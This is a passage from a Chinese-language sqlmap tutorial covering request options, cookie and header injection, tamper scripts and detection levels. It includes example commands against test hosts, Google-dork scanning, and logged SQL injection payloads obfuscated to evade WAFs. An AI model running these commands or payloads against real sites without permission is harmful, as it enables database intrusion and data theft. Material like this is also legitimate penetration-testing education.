\u6216\u8005\u6570\u636e\u8868\n--dependencies \u68c0\u67e5 sqlmap \u7f3a\u5c11\u4ec0\u4e48\uff08\u975e\u6838\u5fc3\uff09\u4f9d\u8d56\n--disable-coloring \u5173\u95ed\u5f69\u8272\u63a7\u5236\u53f0\u8f93\u51fa\n--gpage=GOOGLEPAGE \u6307\u5b9a\u9875\u7801\u4f7f\u7528 Google dork \u7ed3\u679c\n--identify-waf \u9488\u5bf9 WAF\/IPS\/IDS \u4fdd\u62a4\u8fdb\u884c\u5f7b\u5e95\u7684\u6d4b\u8bd5\n--mobile \u4f7f\u7528 HTTP User-Agent \u6a21\u4eff\u667a\u80fd\u624b\u673a\n--offline \u5728\u79bb\u7ebf\u6a21\u5f0f\u4e0b\u5de5\u4f5c\uff08\u4ec5\u4f7f\u7528\u4f1a\u8bdd\u6570\u636e\uff09\n--purge-output \u5b89\u5168\u5730\u5220\u9664\u8f93\u51fa\u76ee\u5f55\u7684\u6240\u6709\u5185\u5bb9\n--skip-waf \u8df3\u8fc7\u542f\u53d1\u5f0f\u68c0\u6d4b WAF\/IPS\/IDS \u4fdd\u62a4\n--smart \u53ea\u6709\u5728\u4f7f\u7528\u542f\u53d1\u5f0f\u68c0\u6d4b\u65f6\u624d\u8fdb\u884c\u5f7b\u5e95\u7684\u6d4b\u8bd5\n--sqlmap-shell \u8c03\u51fa\u4ea4\u4e92\u5f0f sqlmap shell\n--tmp-dir=TMPDIR \u6307\u5b9a\u7528\u4e8e\u5b58\u50a8\u4e34\u65f6\u6587\u4ef6\u7684\u672c\u5730\u76ee\u5f55\n--web-root=WEBROOT \u6307\u5b9a Web \u670d\u52a1\u5668\u6839\u76ee\u5f55\uff08\u4f8b\u5982\uff1a\"\/var\/www\"\uff09\n--wizard \u9002\u5408\u521d\u7ea7\u7528\u6237\u7684\u5411\u5bfc\u754c\u9762<\/code><\/pre>\n
\u5e38\u89c1\u547d\u4ee4<\/h1>\n
sqlmap -u http:\/\/sqlmap.com\/index.php?id=1<\/a> -v 1<\/p>\n
sqlmap -u "http:\/\/192.168.0.103\/06\/vul\/sqli\/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2"<\/a> -v 1<\/p>\n
-u \u548c–url\u53c2\u6570\u4e00\u6837 \u90fd\u662f\u4ee3\u8868\u586b\u5199\u6d4b\u8bd5\u7684url\u8fde\u63a5 \u5982\u679c\u5b58\u5728&\u7b26\u53f7\u9700\u8981\u6dfb\u52a0\u628aurl\u653e\u5728\u53cc\u5f15\u53f7\u5185<\/p>\n
-v \u8868\u793a \u8f93\u51fa\u4fe1\u606f\u8be6\u7ec6\u7a0b\u5ea6\u7ea7\u522b\uff1a0-6\uff08\u9ed8\u8ba4\u4e3a 1\uff09<\/p>\n
\n
0\uff1a\u53ea\u663e\u793aPython\u56de\u6e90\uff08tracebacks\uff09\uff0c\u9519\u8bef\uff08error\uff09\u548c\u5173\u952e\uff08criticle)\u4fe1\u606f\u3002<\/p>\n
1\uff1a\u540c\u65f6\u663e\u793a\u4fe1\u606f(info)\u548c\u8b66\u544a\u4fe1\u606f\uff08warning)\uff08\u9ed8\u8ba4\u4e3a1\uff09<\/p>\n
2: \u540c\u65f6\u663e\u793a\u8c03\u8bd5\u4fe1\u606f\uff08debug\uff09<\/p>\n
3\uff1a\u540c\u65f6\u663e\u793a\u6ce8\u5165\u7684\u6709\u6548\u8f7d\u8377\uff08payloads\uff09<\/p>\n
4\uff1a\u540c\u65f6\u663e\u793ahttp\u8bf7\u6c42<\/p>\n
5\uff1a\u540c\u65f6\u663e\u793ahttp\u54cd\u5e94\u5934<\/p>\n
6\uff1a\u540c\u65f6\u663e\u793ahttp\u54cd\u5e94\u5185\u5bb9<\/p>\n
\u7ea7\u522b\u8d8a\u9ad8\uff0c\u4fe1\u606f\u5c31\u8d8a\u8be6\u7ec6\uff0c\u6839\u636e\u9700\u6c42\u9009\u62e9\u5408\u9002\u7684\u8f93\u51fa\u4fe1\u606f<\/p>\n<\/blockquote>\n
\u6307\u5b9a\u76ee\u6807<\/h2>\n
\u6307\u5b9a\u67d0\u4e2aurl\u8fdb\u884c\u6d4b\u8bd5<\/p>\n
sqlmap -u http:\/\/sqlmap.com\/index.php?id=1<\/a> -v 1<\/p>\n
\u4ece\u6587\u4ef6\u4e2d\u52a0\u8f7dhttp\u8bf7\u6c42\u6d4b\u8bd5<\/p>\n
sqlmap -r url.txt<\/p>\n
\u4eceburpsuite\u6216\u8005\u65e5\u5fd7\u8bfb\u53d6http\u5305<\/p>\n
sqlmap -l post.txt<\/p>\n
\u4ece\u6587\u672c\u4e2d\u83b7\u53d6\u591a\u4e2a\u76ee\u6807\u626b\u63cf<\/p>\n
sqlmap -m url.xt<\/p>\n
\u4ece\u8c37\u6b4c\u5f15\u64ce\u641c\u7d22\u7ed3\u679c\u626b\u63cf<\/p>\n
sqlmap\u53ef\u4ee5\u6d4b\u8bd5\u6ce8\u5165google\u7684\u641c\u7d22\u7ed3\u679c\u4e2d\u7684get\u53c2\u6570<\/p>\n
python sqlmap.py -g "inurl:".php?id=1""<\/p>\n
\u8bf7\u6c42<\/h2>\n
http\u6570\u636e<\/p>\n
\u53c2\u6570 –data<\/p>\n
\u6b64\u53c2\u6570\u662f\u628a\u6570\u636e\u4ee5post\u65b9\u5f0f\u63d0\u4ea4\uff0csqlmap\u4f1a\u81ea\u52a8\u68c0\u6d4bpost\u53c2\u6570<\/p>\n
sqlmap.py -u http:\/\/192.168.0.103\/06\/vul\/sqli\/sqli_id.php<\/a> –data="id=1&submit=\u67e5\u8be2"<\/p>\n
\u53c2\u6570\u62c6\u5206\u5b57\u7b26<\/p>\n
\u53c2\u6570\uff1a–param-del<\/p>\n
\u5f53GET\u6216POST\u7684\u6570\u636e\u9700\u8981\u7528\u5176\u4ed6\u5b57\u7b26\u5206\u5272\u6d4b\u8bd5\u53c2\u6570\u7684\u65f6\u5019\u9700\u8981\u7528\u5230\u6b64\u53c2\u6570\u3002<\/p>\n
\u4f8b\u5b50\uff1a<\/p>\n
sqlmap.py -u "http:\/\/www.target.com\/vuln.php"<\/a> –data="query=foobar;id=1" –param-del=";" -f –banner –dbs –users<\/p>\n
HTTP cookie\u5934<\/h2>\n
\u53c2\u6570\uff1a–cookie,–load-cookies,–drop-set-cookie<\/p>\n
\u8fd9\u4e2a\u53c2\u6570\u5728\u4ee5\u4e0b\u4e24\u4e2a\u65b9\u9762\u5f88\u6709\u7528\uff1a<\/p>\n
1\u3001web\u5e94\u7528\u9700\u8981\u767b\u9646\u7684\u65f6\u5019\u3002<\/p>\n
2\u3001\u4f60\u60f3\u8981\u5728\u8fd9\u4e9b\u5934\u53c2\u6570\u4e2d\u6d4b\u8bd5SQL\u6ce8\u5165\u65f6\u3002<\/p>\n
\u53ef\u4ee5\u901a\u8fc7\u6293\u5305\u628acookie\u83b7\u53d6\u5230\uff0c\u590d\u5236\u51fa\u6765\uff0c\u7136\u540e\u52a0\u5230–cookie\u53c2\u6570\u91cc\u3002<\/p>\n
\u5728HTTP\u8bf7\u6c42\u4e2d\uff0c\u9047\u5230Set-Cookie\u7684\u8bdd\uff0csqlmap\u4f1a\u81ea\u52a8\u83b7\u53d6\u5e76\u4e14\u5728\u4ee5\u540e\u7684\u8bf7\u6c42\u4e2d\u52a0\u5165\uff0c\u5e76\u4e14\u4f1a\u5c1d\u8bd5SQL\u6ce8\u5165\u3002<\/p>\n
\u5982\u679c\u4f60\u4e0d\u60f3\u63a5\u53d7Set-Cookie\u53ef\u4ee5\u4f7f\u7528–drop-set-cookie\u53c2\u6570\u6765\u62d2\u63a5\u3002<\/p>\n
\u5f53\u4f60\u4f7f\u7528–cookie\u53c2\u6570\u65f6\uff0c\u5f53\u8fd4\u56de\u4e00\u4e2aSet-Cookie\u5934\u7684\u65f6\u5019\uff0csqlmap\u4f1a\u8be2\u95ee\u4f60\u7528\u54ea\u4e2acookie\u6765\u7ee7\u7eed\u63a5\u4e0b\u6765\u7684\u8bf7\u6c42\u3002\u5f53–level\u7684\u53c2\u6570\u8bbe\u5b9a\u4e3a2\u6216\u80052\u4ee5\u4e0a\u7684\u65f6\u5019\uff0csqlmap\u4f1a\u5c1d\u8bd5\u6ce8\u5165Cookie\u53c2\u6570\u3002<\/p>\n
HTTP User-Agent\u5934<\/p>\n
\u53c2\u6570\uff1a–user-agent,–random-agent<\/p>\n
\u9ed8\u8ba4\u60c5\u51b5\u4e0bsqlmap\u7684HTTP\u8bf7\u6c42\u5934\u4e2dUser-Agent\u503c\u662f\uff1a<\/p>\n
\u53ef\u4ee5\u4f7f\u7528–user-agent\u53c2\u6570\u6765\u4fee\u6539\uff0c\u540c\u65f6\u4e5f\u53ef\u4ee5\u4f7f\u7528–random-agent\u53c2\u6570\u6765\u968f\u673a\u7684\u4ece.\/txt\/user-agents.txt\u4e2d\u83b7\u53d6\u3002<\/p>\n
\u5f53–level\u53c2\u6570\u8bbe\u5b9a\u4e3a3\u6216\u80053\u4ee5\u4e0a\u7684\u65f6\u5019\uff0c\u4f1a\u5c1d\u8bd5\u5bf9User-Angent\u8fdb\u884c\u6ce8\u5165\u3002<\/p>\n
HTTP Referer\u5934<\/p>\n
\u53c2\u6570\uff1a–referer<\/p>\n
sqlmap\u53ef\u4ee5\u5728\u8bf7\u6c42\u4e2d\u4f2a\u9020HTTP\u4e2d\u7684referer\uff0c\u5f53–level\u53c2\u6570\u8bbe\u5b9a\u4e3a3\u6216\u80053\u4ee5\u4e0a\u7684\u65f6\u5019\u4f1a\u5c1d\u8bd5\u5bf9referer\u6ce8\u5165\u3002\u989d\u5916\u7684HTTP\u5934<\/p>\n
\u53c2\u6570\uff1a–headers<\/p>\n
\u53ef\u4ee5\u901a\u8fc7–headers\u53c2\u6570\u6765\u589e\u52a0\u989d\u5916\u7684http\u5934<\/p>\n
HTTP\u8ba4\u8bc1\u4fdd\u62a4<\/p>\n
\u53c2\u6570\uff1a–auth-type,–auth-cred<\/p>\n
\u8fd9\u4e9b\u53c2\u6570\u53ef\u4ee5\u7528\u6765\u767b\u9646HTTP\u7684\u8ba4\u8bc1\u4fdd\u62a4\u652f\u6301\u4e09\u79cd\u65b9\u5f0f<\/p>\n
1\u3001Basic<\/p>\n
2\u3001Digest<\/p>\n
3\u3001NTLM<\/p>\n
\u4f8b\u5b50\uff1a<\/p>\n
python sqlmap.py -u "http:\/\/192.168.136.131\/sqlmap\/mysql\/basic\/get_int.php?id=1"<\/a> –auth-type Basic –auth-cred"testuser:testpass"<\/p>\n
HTTP\u534f\u8bae\u7684\u8bc1\u4e66\u8ba4\u8bc1<\/h2>\n
\u53c2\u6570\uff1a–auth-cert<\/p>\n
\u5f53Web\u670d\u52a1\u5668\u9700\u8981\u5ba2\u6237\u7aef\u8bc1\u4e66\u8fdb\u884c\u8eab\u4efd\u9a8c\u8bc1\u65f6\uff0c\u9700\u8981\u63d0\u4f9b\u4e24\u4e2a\u6587\u4ef6:key_file\uff0ccert_file\u3002<\/p>\n
key_file\u662f\u683c\u5f0f\u4e3aPEM\u6587\u4ef6\uff0c\u5305\u542b\u7740\u4f60\u7684\u79c1\u94a5\uff0ccert_file\u662f\u683c\u5f0f\u4e3aPEM\u7684\u8fde\u63a5\u6587\u4ef6<\/p>\n
HTTP(S)\u4ee3\u7406<\/h2>\n
\u53c2\u6570\uff1a–proxy,–proxy-cred\u548c–ignore-proxy<\/p>\n
\u4f7f\u7528–proxy\u4ee3\u7406\u662f\u683c\u5f0f\u4e3a\uff1ahttp:\/\/url:port<\/a>\u3002<\/p>\n
\u5f53HTTP(S)\u4ee3\u7406\u9700\u8981\u8ba4\u8bc1\u662f\u53ef\u4ee5\u4f7f\u7528–proxy-cred\u53c2\u6570\uff1ausername:password\u3002<\/p>\n
–ignore-proxy\u62d2\u7edd\u4f7f\u7528\u672c\u5730\u5c40\u57df\u7f51\u7684HTTP(S)\u4ee3\u7406<\/p>\n
HTTP\u8bf7\u6c42\u5ef6\u8fdf<\/h2>\n
\u53c2\u6570\uff1a–delay<\/p>\n
\u53ef\u4ee5\u8bbe\u5b9a\u4e24\u4e2aHTTP(S)\u8bf7\u6c42\u95f4\u7684\u5ef6\u8fdf\uff0c\u8bbe\u5b9a\u4e3a0.5\u7684\u65f6\u5019\u662f\u534a\u79d2\uff0c\u9ed8\u8ba4\u662f\u6ca1\u6709\u5ef6\u8fdf\u7684<\/p>\n
\u8bbe\u5b9a\u8d85\u65f6\u65f6\u95f4<\/h2>\n
\u53c2\u6570\uff1a–timeout<\/p>\n
\u53ef\u4ee5\u8bbe\u5b9a\u4e00\u4e2aHTTP(S)\u8bf7\u6c42\u8d85\u8fc7\u591a\u4e45\u5224\u5b9a\u4e3a\u8d85\u65f6\uff0c10.5\u8868\u793a10.5\u79d2\uff0c\u9ed8\u8ba4\u662f30s<\/p>\n
\u8bbe\u5b9a\u91cd\u8bd5\u8d85\u65f6<\/h2>\n
\u53c2\u6570\uff1a–retries<\/p>\n
\u5f53HTTP(S)\u8d85\u65f6\u65f6\uff0c\u53ef\u4ee5\u8bbe\u5b9a\u91cd\u65b0\u5c1d\u8bd5\u8fde\u63a5\u6b21\u6570\uff0c\u9ed8\u8ba4\u662f3\u6b21<\/p>\n
\u8bbe\u5b9a\u968f\u673a\u6539\u53d8\u7684\u53c2\u6570\u503c<\/h2>\n
\u53c2\u6570\uff1a–randomize<\/p>\n
\u53ef\u4ee5\u8bbe\u5b9a\u67d0\u4e00\u4e2a\u53c2\u6570\u503c\u5728\u6bcf\u4e00\u6b21\u8bf7\u6c42\u4e2d\u968f\u673a\u7684\u53d8\u5316\uff0c\u957f\u5ea6\u548c\u7c7b\u578b\u4f1a\u4e0e\u63d0\u4f9b\u7684\u521d\u59cb\u503c\u4e00\u6837<\/p>\n
\u5229\u7528\u6b63\u5219\u8fc7\u6ee4\u76ee\u6807\u7f51\u5740<\/h2>\n
\u53c2\u6570\uff1a–scope<\/p>\n
\u4f8b\u5982\uff1apython sqlmap.py -l burp.log –scope="(www)?.target.(com|net|org)"<\/p>\n
\u907f\u514d\u8fc7\u591a\u7684\u9519\u8bef\u8bf7\u6c42\u88ab\u5c4f\u853d<\/h2>\n
\u53c2\u6570\uff1a–safe-url,–safe-freq<\/p>\n
\u6709\u7684web\u5e94\u7528\u7a0b\u5e8f\u4f1a\u5728\u4f60\u591a\u6b21\u8bbf\u95ee\u9519\u8bef\u7684\u8bf7\u6c42\u65f6\u5c4f\u853d\u6389\u4f60\u4ee5\u540e\u7684\u6240\u6709\u8bf7\u6c42\uff0c\u8fd9\u6837\u5728sqlmap\u8fdb\u884c\u63a2\u6d4b\u6216\u8005\u6ce8\u5165\u7684\u65f6\u5019\u53ef\u80fd\u9020\u6210\u9519\u8bef\u8bf7\u6c42\u800c\u89e6\u53d1\u8fd9\u4e2a\u7b56\u7565\uff0c\u5bfc\u81f4\u4ee5\u540e\u65e0\u6cd5\u8fdb\u884c\u3002<\/p>\n
\u7ed5\u8fc7\u8fd9\u4e2a\u7b56\u7565\u6709\u4e24\u79cd\u65b9\u5f0f\uff1a<\/p>\n
1\u3001–safe-url\uff1a\u63d0\u4f9b\u4e00\u4e2a\u5b89\u5168\u4e0d\u9519\u8bef\u7684\u8fde\u63a5\uff0c\u6bcf\u9694\u4e00\u6bb5\u65f6\u95f4\u90fd\u4f1a\u53bb\u8bbf\u95ee\u4e00\u4e0b\u3002<\/p>\n
2\u3001–safe-freq\uff1a\u63d0\u4f9b\u4e00\u4e2a\u5b89\u5168\u4e0d\u9519\u8bef\u7684\u8fde\u63a5\uff0c\u6bcf\u6b21\u6d4b\u8bd5\u8bf7\u6c42\u4e4b\u540e\u90fd\u4f1a\u518d\u8bbf\u95ee\u4e00\u8fb9\u5b89\u5168\u8fde\u63a5\u3002<\/p>\n
\u5173\u6389URL\u53c2\u6570\u503c\u7f16\u7801<\/h2>\n
\u53c2\u6570\uff1a–skip-urlencode<\/p>\n
\u6839\u636e\u53c2\u6570\u4f4d\u7f6e\uff0c\u4ed6\u7684\u503c\u9ed8\u8ba4\u5c06\u4f1a\u88abURL\u7f16\u7801\uff0c\u4f46\u662f\u6709\u4e9b\u65f6\u5019\u540e\u7aef\u7684web\u670d\u52a1\u5668\u4e0d\u9075\u5b88RFC\u6807\u51c6\uff0c\u53ea\u63a5\u53d7\u4e0d\u7ecf\u8fc7URL\u7f16\u7801\u7684\u503c\uff0c\u8fd9\u65f6\u5019\u5c31\u9700\u8981\u7528–skip-urlencode\u53c2\u6570\u3002<\/p>\n
\u6bcf\u6b21\u8bf7\u6c42\u65f6\u5019\u6267\u884c\u81ea\u5b9a\u4e49\u7684python\u4ee3\u7801<\/h2>\n
\u53c2\u6570\uff1a–eval<\/p>\n
\u5728\u6709\u4e9b\u65f6\u5019\uff0c\u9700\u8981\u6839\u636e\u67d0\u4e2a\u53c2\u6570\u7684\u53d8\u5316\uff0c\u800c\u4fee\u6539\u53e6\u4e2a\u4e00\u53c2\u6570\uff0c\u624d\u80fd\u5f62\u6210\u6b63\u5e38\u7684\u8bf7\u6c42\uff0c\u8fd9\u65f6\u53ef\u4ee5\u7528–eval\u53c2\u6570\u5728\u6bcf\u6b21\u8bf7\u6c42\u65f6\u6839\u636e\u6240\u5199python\u4ee3\u7801\u505a\u5b8c\u4fee\u6539\u540e\u8bf7\u6c42\u3002<\/p>\n
\u4f8b\u5b50\uff1a<\/p>\n
python sqlmap.py -u "http:\/\/www.target.com\/vuln.php?id=1&hash=c4ca4238a0b923820dcc509a6f75849b"<\/a> –eval="import<\/p>\n
hashlib;hash=hashlib.md5(id).hexdigest()"<\/p>\n
\u4e0a\u9762\u7684\u8bf7\u6c42\u5c31\u662f\u6bcf\u6b21\u8bf7\u6c42\u65f6\u6839\u636eid\u53c2\u6570\u503c\uff0c\u505a\u4e00\u6b21md5\u540e\u4f5c\u4e3ahash\u53c2\u6570\u7684\u503c<\/p>\n
\u6ce8\u5165<\/h1>\n
\u6d4b\u8bd5\u53c2\u6570<\/h2>\n
\u53c2\u6570\uff1a-p,–skip<\/p>\n
sqlmap\u9ed8\u8ba4\u6d4b\u8bd5\u6240\u6709\u7684GET\u548cPOST\u53c2\u6570\uff0c\u5f53–level\u7684\u503c\u5927\u4e8e\u7b49\u4e8e2\u7684\u65f6\u5019\u4e5f\u4f1a\u6d4b\u8bd5HTTP Cookie\u5934\u7684\u503c\uff0c\u5f53\u5927\u4e8e\u7b49\u4e8e3\u7684\u65f6\u5019\u4e5f\u4f1a\u6d4b\u8bd5User-Agent\u548cHTTP Referer\u5934\u7684\u503c\u3002\u4f46\u662f\u4f60\u53ef\u4ee5\u624b\u52a8\u7528-p\u53c2\u6570\u8bbe\u7f6e\u60f3\u8981\u6d4b\u8bd5\u7684\u53c2\u6570\u3002\u4f8b\u5982\uff1a -p "id,user-anget"<\/p>\n
\u5f53\u4f60\u4f7f\u7528–level\u7684\u503c\u5f88\u5927\u4f46\u662f\u6709\u4e2a\u522b\u53c2\u6570\u4e0d\u60f3\u6d4b\u8bd5\u7684\u65f6\u5019\u53ef\u4ee5\u4f7f\u7528–skip\u53c2\u6570\u3002<\/p>\n
\u4f8b\u5982\uff1a–skip="user-angent.referer"<\/p>\n
\u5728\u6709\u4e9b\u65f6\u5019web\u670d\u52a1\u5668\u4f7f\u7528\u4e86URL\u91cd\u5199\uff0c\u5bfc\u81f4\u65e0\u6cd5\u76f4\u63a5\u4f7f\u7528sqlmap\u6d4b\u8bd5\u53c2\u6570\uff0c\u53ef\u4ee5\u5728\u60f3\u6d4b\u8bd5\u7684\u53c2\u6570\u540e\u9762\u52a0*<\/p>\n
\u4f8b\u5982\uff1a<\/p>\n
python sqlmap.py -u "http:\/\/targeturl\/param1\/value1*\/param2\/value2\/"<\/a><\/p>\n
sqlmap\u5c06\u4f1a\u6d4b\u8bd5value1\u7684\u4f4d\u7f6e\u662f\u5426\u53ef\u6ce8\u5165\u3002<\/p>\n
\u6307\u5b9a\u6570\u636e\u5e93<\/h2>\n
\u53c2\u6570\uff1a–dbms<\/p>\n
\u9ed8\u8ba4\u60c5\u51b5\u7cfbsqlmap\u4f1a\u81ea\u52a8\u7684\u63a2\u6d4bweb\u5e94\u7528\u540e\u7aef\u7684\u6570\u636e\u5e93\u662f\u4ec0\u4e48\uff0csqlmap\u652f\u6301\u7684\u6570\u636e\u5e93\u6709\uff1a<\/p>\n
MySQL\u3001Oracle\u3001PostgreSQL\u3001Microsoft SQL Server\u3001Microsoft Access\u3001SQLite\u3001Firebird\u3001Sybase\u3001SAP MaxDB\u3001DB2<\/p>\n
\u6307\u5b9a\u6570\u636e\u5e93\u670d\u52a1\u5668\u7cfb\u7edf<\/h2>\n
\u53c2\u6570\uff1a–os<\/p>\n
\u9ed8\u8ba4\u60c5\u51b5\u4e0bsqlmap\u4f1a\u81ea\u52a8\u7684\u63a2\u6d4b\u6570\u636e\u5e93\u670d\u52a1\u5668\u7cfb\u7edf\uff0c\u652f\u6301\u7684\u7cfb\u7edf\u6709\uff1aLinux\u3001Windows\u3002<\/p>\n
\u6307\u5b9a\u65e0\u6548\u7684\u5927\u6570\u5b57<\/h2>\n
\u53c2\u6570\uff1a–invalid-bignum<\/p>\n
\u5f53\u4f60\u60f3\u6307\u5b9a\u4e00\u4e2a\u62a5\u9519\u7684\u6570\u503c\u65f6\uff0c\u53ef\u4ee5\u4f7f\u7528\u8fd9\u4e2a\u53c2\u6570\uff0c\u4f8b\u5982\u9ed8\u8ba4\u60c5\u51b5\u7cfbid=13\uff0csqlmap\u4f1a\u53d8\u6210id=-13\u6765\u62a5\u9519\uff0c\u4f60\u53ef\u4ee5\u6307\u5b9a\u6bd4\u5982id=9999999\u6765\u62a5<\/p>\n
\u9519\u3002<\/p>\n
\u6307\u5b9a\u65e0\u6548\u7684\u903b\u8f91<\/h2>\n
\u53c2\u6570\uff1a–invalid-logical<\/p>\n
\u539f\u56e0\u540c\u4e0a\uff0c\u53ef\u4ee5\u6307\u5b9aid=13\u628a\u539f\u6765\u7684id=-13\u7684\u62a5\u9519\u6539\u6210id=13 AND 18=19\u3002<\/p>\n
\u6ce8\u5165payload<\/p>\n
\u53c2\u6570\uff1a–prefix,–suffix<\/p>\n
\u5728\u6709\u4e9b\u73af\u5883\u4e2d\uff0c\u9700\u8981\u5728\u6ce8\u5165\u7684payload\u7684\u524d\u9762\u6216\u8005\u540e\u9762\u52a0\u4e00\u4e9b\u5b57\u7b26\uff0c\u6765\u4fdd\u8bc1payload\u7684\u6b63\u5e38\u6267\u884c\u3002<\/p>\n
\u4f8b\u5982\uff0c\u4ee3\u7801\u4e2d\u662f\u8fd9\u6837\u8c03\u7528\u6570\u636e\u5e93\u7684<\/p>\n
$query = "SELECT * FROM users WHERE id=(\u2019" . $_GET[\u2019id\u2019] . "\u2019) LIMIT 0, 1";<\/p>\n
\u8fd9\u65f6\u4f60\u5c31\u9700\u8981–prefix\u548c–suffix\u53c2\u6570\u4e86\uff1a<\/p>\n
python sqlmap.py -u "http:\/\/192.168.136.131\/sqlmap\/mysql\/get_str_brackets.php?id=1"<\/a> -p id –prefix "\u2019)" —<\/p>\n
suffix "AND (\u2019abc\u2019=\u2019abc"<\/p>\n
\u8fd9\u6837\u6267\u884c\u7684SQL\u8bed\u53e5\u53d8\u6210\uff1a$query = "SELECT * FROM users WHERE id=(\u20191\u2019)  AND (\u2019abc\u2019=\u2019abc\u2019) LIMIT 0, 1";<\/p>\n
\u4fee\u6539\u6ce8\u5165\u7684\u6570\u636e<\/h2>\n
\u53c2\u6570\uff1a–tamper<\/p>\n
sqlmap\u9664\u4e86\u4f7f\u7528CHAR()\u51fd\u6570\u6765\u9632\u6b62\u51fa\u73b0\u5355\u5f15\u53f7\u4e4b\u5916\u6ca1\u6709\u5bf9\u6ce8\u5165\u7684\u6570\u636e\u4fee\u6539\uff0c\u4f60\u53ef\u4ee5\u4f7f\u7528–tamper\u53c2\u6570\u5bf9\u6570\u636e\u505a\u4fee\u6539\u6765\u7ed5\u8fc7WAF\u7b49\u8bbe\u5907\u3002<\/p>\n
\u4e0b\u9762\u662f\u4e00\u4e2atamper\u811a\u672c\u7684\u683c\u5f0f\uff1a<\/p>\n
# Needed imports\nfrom lib.core.enums import PRIORITY\n# Define which is the order of application of tamper scripts against\n# the payload\n__priority__ = PRIORITY.NORMAL\ndef tamper(payload):\n'''\nDescription of your tamper script\n'''\nretVal = payload\n# your code to tamper the original payload\n# return the tampered payload\nreturn retVal<\/code><\/pre>\n
\u53ef\u4ee5\u67e5\u770b tamper\/ \u76ee\u5f55\u4e0b\u7684\u6709\u54ea\u4e9b\u53ef\u7528\u7684\u811a\u672c<\/p>\n
\u4f8b\u5982\uff1a<\/p>\n
$ python sqlmap.py -u \"http:\/\/192.168.136.131\/sqlmap\/mysql\/get_int.php?id=1\" --tamper\ntamper\/between.py,tamper\/randomcase.py,tamper\/space2comment.py -v 3\n[hh:mm:03] [DEBUG] cleaning up configuration parameters\n[hh:mm:03] [INFO] loading tamper script 'between'\n[hh:mm:03] [INFO] loading tamper script 'randomcase'\n[hh:mm:03] [INFO] loading tamper script 'space2comment'\n[...]\n[hh:mm:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'\n[hh:mm:04] [PAYLOAD] 1)\/**\/And\/**\/1369=7706\/**\/And\/**\/(4092=4092\n[hh:mm:04] [PAYLOAD] 1)\/**\/AND\/**\/9267=9267\/**\/AND\/**\/(4057=4057\n[hh:mm:04] [PAYLOAD] 1\/**\/AnD\/**\/950=7041\n[...]\n[hh:mm:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'\n[hh:mm:04] [PAYLOAD] 1\/**\/anD\/**\/(SELeCt\/**\/9921\/**\/fROm(SELeCt\/**\/counT(*),CONCAT(cHar(\n58,117,113,107,58),(SELeCt\/**\/(case\/**\/whEN\/**\/(9921=9921)\/**\/THeN\/**\/1\/**\/elsE\/**\/0\/**\/\nENd)),cHar(58,106,104,104,58),FLOOR(RanD(0)*2))x\/**\/fROm\/**\/information_schema.tables\/**\/\ngroup\/**\/bY\/**\/x)a)\n[hh:mm:04] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING\nclause' injectable\n[...]<\/code><\/pre>\n
\u63a2\u6d4b<\/h1>\n
\u63a2\u6d4b\u7b49\u7ea7<\/h2>\n
\u53c2\u6570\uff1a–level<\/p>\n
\u5171\u6709\u4e94\u4e2a\u7b49\u7ea7\uff0c\u9ed8\u8ba4\u4e3a1\uff0csqlmap\u4f7f\u7528\u7684payload\u53ef\u4ee5\u5728xml\/payloads.xml\u4e2d\u770b\u5230\uff0c\u4f60\u4e5f\u53ef\u4ee5\u6839\u636e\u76f8\u5e94\u7684\u683c\u5f0f\u6dfb\u52a0\u81ea\u5df1\u7684payload\u3002<\/p>\n
\u8fd9\u4e2a\u53c2\u6570\u4e0d\u4ec5\u5f71\u54cd\u4f7f\u7528\u54ea\u4e9bpayload\u540c\u65f6\u4e5f\u4f1a\u5f71\u54cd\u6d4b\u8bd5\u7684\u6ce8\u5165\u70b9\uff0cGET\u548cPOST\u7684\u6570\u636e\u90fd\u4f1a\u6d4b\u8bd5\uff0cHTTP Cookie\u5728level\u4e3a2\u7684\u65f6\u5019\u5c31\u4f1a\u6d4b\u8bd5\uff0c<\/p>\n
HTTP User-Agent\/Referer\u5934\u5728level\u4e3a3\u7684\u65f6\u5019\u5c31\u4f1a\u6d4b\u8bd5\u3002<\/p>\n
\u603b\u4e4b\u5728\u4f60\u4e0d\u786e\u5b9a\u54ea\u4e2apayload\u6216\u8005\u53c2\u6570\u4e3a\u6ce8\u5165\u70b9\u7684\u65f6\u5019\uff0c\u4e3a\u4e86\u4fdd\u8bc1\u5168\u9762\u6027\uff0c\u5efa\u8bae\u4f7f\u7528\u9ad8\u7684level\u503c\u3002<\/p>\n
\u98ce\u9669\u7b49\u7ea7<\/h2>\n
\u53c2\u6570\uff1a–risk<\/p>\n
\u5171\u6709\u56db\u4e2a\u98ce\u9669\u7b49\u7ea7\uff0c\u9ed8\u8ba4\u662f1\u4f1a\u6d4b\u8bd5\u5927\u90e8\u5206\u7684\u6d4b\u8bd5\u8bed\u53e5\uff0c2\u4f1a\u589e\u52a0\u57fa\u4e8e\u4e8b\u4ef6\u7684\u6d4b\u8bd5\u8bed\u53e5\uff0c3\u4f1a\u589e\u52a0OR\u8bed\u53e5\u7684SQL\u6ce8\u5165\u6d4b\u8bd5\u3002<\/p>\n
\u5728\u6709\u4e9b\u65f6\u5019\uff0c\u4f8b\u5982\u5728UPDATE\u7684\u8bed\u53e5\u4e2d\uff0c\u6ce8\u5165\u4e00\u4e2aOR\u7684\u6d4b\u8bd5\u8bed\u53e5\uff0c\u53ef\u80fd\u5bfc\u81f4\u66f4\u65b0\u7684\u6574\u4e2a\u8868\uff0c\u53ef\u80fd\u9020\u6210\u5f88\u5927\u7684\u98ce\u9669\u3002<\/p>\n
\u6d4b\u8bd5\u7684\u8bed\u53e5\u540c\u6837\u53ef\u4ee5\u5728xml\/payloads.xml\u4e2d\u627e\u5230\uff0c\u4f60\u4e5f\u53ef\u4ee5\u81ea\u884c\u6dfb\u52a0payload\u3002<\/p>\n
\u9875\u9762\u6bd4\u8f83<\/h2>\n
\u53c2\u6570\uff1a–string,–not-string,–regexp,–code<\/p>\n
